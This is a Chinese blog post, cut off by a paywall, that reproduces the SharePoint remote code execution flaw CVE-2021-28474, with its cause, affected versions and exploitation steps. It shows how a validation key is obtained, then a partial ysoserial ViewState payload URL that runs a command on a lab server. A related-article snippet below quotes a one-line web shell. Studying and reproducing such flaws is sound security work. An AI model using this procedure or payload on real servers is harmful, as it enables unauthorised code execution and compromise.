所学漏洞总结

最新推荐文章于 2023-07-25 11:00:31 发布
VIP文章 最新推荐文章于 2023-07-25 11:00:31 发布
阅读量828 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45540609/article/details/119995708
版权

一、CVE-2021-28474 MS SharePoint远程代码执行漏洞

1、漏洞简介

漏洞允许通过身份验证的用户在SharePoint web应用程序的服务账户中执行任意.NET代码。想要利用该漏洞,攻击者需要具备SharePoint站点的SPBasePermissions.ManageLists权限。默认情况下,经过身份验证的SharePoint用户可以创建网页页面,并拥有所需的所有权限。

2、漏洞成因

用于安全验证的代码和实际处理用户输入的代码之间不一致。

EditingPageParser.VerifyControlOnSafeList()提供验证,验证输入是否包含不安全控件,也就是验证web.config文件中SafeControl未将任何控件标记为安全。

EditingPageParser.ParseStringInternal()解析用户输入,寄存器中信息填充hashtable,服务器控件标记中的值填充hashtable2。根据web.config中的SafeControl验证hashtable2,如果有没有被标记为安全的控件,就会抛出异常。

SharePoint只验证服务器端控件带有runat=“server”属性的标记

验证通过SharePoint处理标记。

处理时,text4 = HttpUtility.HtmlDecode(text4)属性值有解析器进行HTML解码,但验证时没有相应行。

加入我们runat=“sserver”,EditingPageParser.VerifyControlOnSafeList()函数不会将其视为服务器端控件,也不会检查它的安全性。但是,在处理时,它将被识别为服务器端控件并执行。

3、漏洞影响范围

Microsoft SharePoint Foundation 2013 Service Pack 1

Microsoft SharePoint Server 2019

Microsoft SharePoint Enterprise Server 2016

4、漏洞利用

普通用户创建站点

指向该站点任何站点页面的相对路径

使用自定义可执行文件向易受攻击的服务器发送请求以触发漏洞。需要提供网站地址、凭证和相对路径。

攻击成功会收到web.config的内容,在web.config中获取validationKey和validationAlg="HMACSHA256"

进入攻击目标的SharePoint,打开C:windows emp文件夹,此时文件夹不存在我们上传的文件。

在攻击者主机上打开success.aspx页面,源代码视图找到__VIEWSTATEGENERATOR

用ysoserial生成ViewState的paylolad,将其作为__VIEWSTATE参数发送到目标服务器

http://sp2019/sites/ts01/_layouts/15/success.aspx?__VIEWSTATE=%2FwEy2gcAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAwCAAAABlN5c3RlbQUBAAAAQFN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLG1zY29ybGliXV0EAAAABUNvdW50CENvbXBhcmVyB1ZlcnNpb24FSXRlbXMAAQABCAgCAAAAAgAAAAkDAAAAAAAAAAkEAAAABAMAAABAU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuQ29tcGFyaXNvbkNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmddXQEAAAALX2NvbXBhcmlzb24BCQUAAAARBAAAAAIAAAAGBgAAACsvYyBlY2hvIFJDRSA%2BIGM6L3dpbmRvd3MvdGVtcC9TUF9SQ0VfMDEudHh0BgcAAAADY21kBAUAAAAiU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcgMAAAAIRGVsZWdhdGUAAXgBAQEJCAAAAA0ADQAECAAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkAEnRhcmdldF
最低0.47元/天 解锁文章
玛卡巴卡巴巴亚卡
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
利用SQL注入漏洞拖库的方法
09-11
利用SQL注入漏洞登录后台和利用SQL注入漏洞拖库是我习了相关内容之后的一点小结,没啥深度,正如文章开头所说,权当总结,别无它意
漏洞近期总结(自用)
PurEandPure
05-11 114
攻击者可以通过一些漏洞上传一句话木马到Web服务器上,一旦成功,攻击者就可以通过发送HTTP请求执行一句话木马中的命令来远程操纵受害者服务器。SQL注入的原理是攻击者通过构造恶意的SQL查询语句,以绕过应用程序的验证和过滤机制,从而对目标数据库进行非法操作,例如读取或篡改数据表,或者在数据库中执行任意的SQL命令,甚至获取数据库管理员权限。例如,<%eval request("c")%>,攻击者将代码传递到服务器上的url上,以执行该代码。例如,最常见的一句话木马代码是:<?
web安全漏洞总结
weixin_49349476的博客
07-25 3107
分析了一下漏洞造成的原因,怎么利用漏洞,怎么防御漏洞漏洞分为两个部分,常见的漏洞:sql注入、文件上传漏洞、文件包含漏洞、代码执行漏洞、命令执行漏洞、代码执行漏洞、xxe、xss、csrf、ssrf漏洞、反序列化漏洞、中间件漏洞、解析漏洞、权限提升漏洞。 第二部分:敏感信息漏洞、授权访问漏洞、逻辑漏洞、未授权访问、中间件漏洞
Windows系统漏洞总结
热门推荐
bcbobo21cn的专栏
04-01 1万+
Windows系统常见漏洞分析   由于windows NT/2000操作系统的普及率和市场占有率比较高,所以很容易使它成为很多黑客攻击的目标。目前,Windows NT/2000最主要的漏洞有Unicode漏洞、.ida/.idq缓冲区溢出漏洞、Microsoft IIS CGI文件名错误解码漏洞、MSADCS RDS弱点漏洞、FrontPage服务器扩展和.Printer漏洞等等。下面笔者将
Spring MVC漏洞总结
bcbobo21cn的专栏
07-05 1万+
Spring MVC命令执行漏洞 http://book.51cto.com/art/201204/330094.htm 《白帽子讲Web安全》第12章Web框架安全,本章讲述了一些Web框架中可以实施的安全方案。Web框架本 身也是应用程序的一个组成部分,只是这个组成部分较为特殊,处于基础和底层的位置。Web框架为安全 方案的设计提供了很多便利,好好利用它的强大功能,能够
struts2漏洞总结
bcbobo21cn的专栏
06-24 2035
struts2安全漏洞 Struts2是apache项目下的一个web 框架,普遍应用于阿里巴巴、京东等互联网、政府、企业门户网站。 目录 1 背景 2 内容 3 造成的影响: 4 应对措施: 背景 Struts2是apache项目下的一个web 框架,普遍应用于阿里巴巴、京东等互联网、政府、企业门户网站。 内容 在2013年6月底发布的Struts 2.3.15版本被曝出存在
网络安全知识总结.docx
06-09
网络安全知识总结全文共14页,当前为第1页。网络安全知识总结全文共14页,当前为第1页。网络安全知识总结 网络安全知识总结全文共14页,当前为第1页。 网络安全知识总结全文共14页,当前为第1页。 1. 网络平安习...
根据课上习,全面总结等保测评的背景、发展、具体案例、实施、《信息系统安全等级保护指南》以及需要准备的材料
11-01
提高信息系统安全性:等保测评可以发现信息系统中存在的安全漏洞和风险,帮助组织及时采取措施加强安全防护,从而提高信息系统的安全性。 合规要求:根据我国《网络安全法》和相关政策法规,特定行业和领域的信息...
基于c语言实现的对代码的同源性检测.zip
01-13
本次课程设计为了巩固上期在软件安全课程上所的安全知识,包括...l 对于漏洞的检测,包括几种不同类型的漏洞种类,这要求生对于每种漏洞的特征做一个总结,通过静态分析的方式将代码中可能隐藏的漏洞发掘出来。
网络信息扫描实验
05-11
网络漏洞扫描工具是指通过网络检测远程目标网络和主机系统所存在漏洞的扫描工具。本实验主要针对网络漏洞扫描工具进行介绍。 1)端口的基础知识 为了了解扫描工具的工作原理,首先简单介绍一下端口的基本知识。 端口...
CVE2020-2555漏洞分析
weixin_45540609的博客
08-05 2100
一、简介 Oracle Coherence为Oracle融合中间件中的产品,在WebLogic 12c及以上版本中默认集成到WebLogic安装包中,T3是用于在WebLogic服务器和其他类型的Java程序之间传输信息的协议。 weblogic反序列化远程命令执行漏洞(CVE-2020-2555),Oracle Fusion中间件Oracle Coherence存在缺陷,攻击者可利用该漏洞再未授权情况下通过构造T3协议请求,获取weblogic服务器权限,执行任意命令。 漏洞影响情况: Oracl
Tomcat任意文件写入(CVE-2017-12615)漏洞复现
weixin_45540609的博客
07-28 1889
一、漏洞原理 影响范围:pache Tomcat7.0.0-7.0.81(默认配置) 如果配置了默认servlet,则在9.0.1(Beta),8.5.23,8.0.47和7.0.82之前的所有Tomcat版本都包含所有操作系统上的潜在危险的远程执行代码(RCE)漏洞,CVE-2017-12615:远程代码执行漏洞。只需参数readonly设置为false或者使用参数readonly设置启用WebDAV servlet false。此配置将允许任何未经身份验证的用户上传文件(如WebDAV中所使用的).
Vulhub-Mysql 身份认证绕过漏洞(CVE-2012-2122)
weixin_45540609的博客
09-08 795
一、漏洞简介 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。 二、漏洞范围 MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not. MySQL versions from 5.1.63, 5.5.24, 5.
CVE-2019-0232(Apache Tomcat 远程代码执行)漏洞复现
weixin_45540609的博客
07-28 775
一、漏洞简介 2019年4月10日,Apache Tomcat披露了一个漏洞漏洞编号为CVE-2019-0232,该漏洞存在于启用了enableCmdLineArguments选项的CGI Servlet中,与JRE向Windows传递参数过程中的bug有关。成功利用此漏洞可允许远程攻击者在目标服务器上执行任意命令,从而导致服务器被完全控制。由于Apache Tomcat应用范围广泛,该漏洞一旦被大规模利用,带来后果将不堪设想 影响版本: Apache Tomcat 9.0.0.M1 to 9.0.
CVE-2021-3560 Polkit权限提升漏洞复现
weixin_45540609的博客
08-31 722
原理先不写了,毕竟之前写过 使用ubuntu16.04镜像 首先启动ssh服务 sudo service sshd start 通过ssh连接到本地 ssh [username]@127.0.0.1 此时在ssh连接的文本模式执行pkexec会启动文本验证 dbus-send指令可以从命令行触发polkit认证,如果在文本模式会话中执行,会立即执行失败,因为dbus-send不会启动自己的身份验证代理程序,而pkexec会自己启动身份验证。 CVE-2021-3560漏洞..
(CVE-2016-5734)phpmyadmin反序列化漏洞复现
weixin_45540609的博客
09-08 437
一、漏洞简介 在PHP5.4.7以前,preg_replace的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞。 二、漏洞原理 https://www.jianshu.com/p/8e44cb1b5b5b 三、漏洞利用 https://blog.csdn.net/weixin_52777165/article/details/112251253 vulhub搭建环境 访问 poc如下: https:/..
JavaScript_构建您的第一个移动应用程序.zip
05-20
JavaScript
手机应用源码新浪微博Android客户端.rar
最新发布
05-20
手机应用源码新浪微博Android客户端.rar
后端前端应该怎么?
08-16
通过做一些前端的小项目或参与到实际的前端开发中,不断积累经验和解决实际问题,这样能够更好地巩固所的知识,并且了解到前端开发中的一些实际应用场景和注意事项。 总结来说,后端习前端需要具备一定的前端...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值